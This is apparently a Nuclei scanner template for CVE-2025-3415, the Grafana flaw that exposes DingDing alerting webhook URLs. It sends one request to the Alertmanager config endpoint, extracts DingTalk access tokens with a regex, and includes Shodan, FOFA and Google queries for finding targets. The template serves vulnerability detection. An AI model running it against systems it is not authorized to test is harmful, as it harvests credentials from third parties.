漏洞描述
An incident occurred where the DingDing alerting integration URL was inadvertently exposed to viewers due to a setting oversight in versions below or equals to 12.0.1.
id: CVE-2025-3415
info:
name: Grafana - Exposes DingDing API Keys
author: lucasribolli
severity: medium
description: |
An incident occurred where the DingDing alerting integration URL was inadvertently exposed to viewers due to a setting oversight in versions below or equals to 12.0.1.
reference:
- https://grafana.com/blog/2025/06/13/grafana-security-update-medium-severity-security-release-for-cve-2025-3415/
classification:
epss-score: 0.00583
epss-percentile: 0.6806
metadata:
verified: true
max-request: 1
vendor: grafana
product: grafana
shodan-query:
- http.title:"grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
fofa-query:
- title="grafana"
- app="grafana"
google-query: intitle:"grafana"
tags: cve,cve2025,grafana,dingding,dingtalk,apikey,vkev
http:
- raw:
- |
GET /api/alertmanager/grafana/config/api/v1/alerts HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "dingtalk.com","dingding-context")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
extractors:
- type: regex
name: dingding-integration-url
part: body
regex:
- '(?i)https?://oapi\.dingtalk\.com/robot/send\?access_token=[^&"\s]+'
# digest: 4a0a004730450220252d58441c96fa78e43254d41f88c4a5ee7bd2f7963d51c87b18025b9418272402210084eab12c0327b29e42354c429f00aba640d0e8b677cc0d5fde9d65bac312eba3:922c64590222798bb761d5b6d8e72950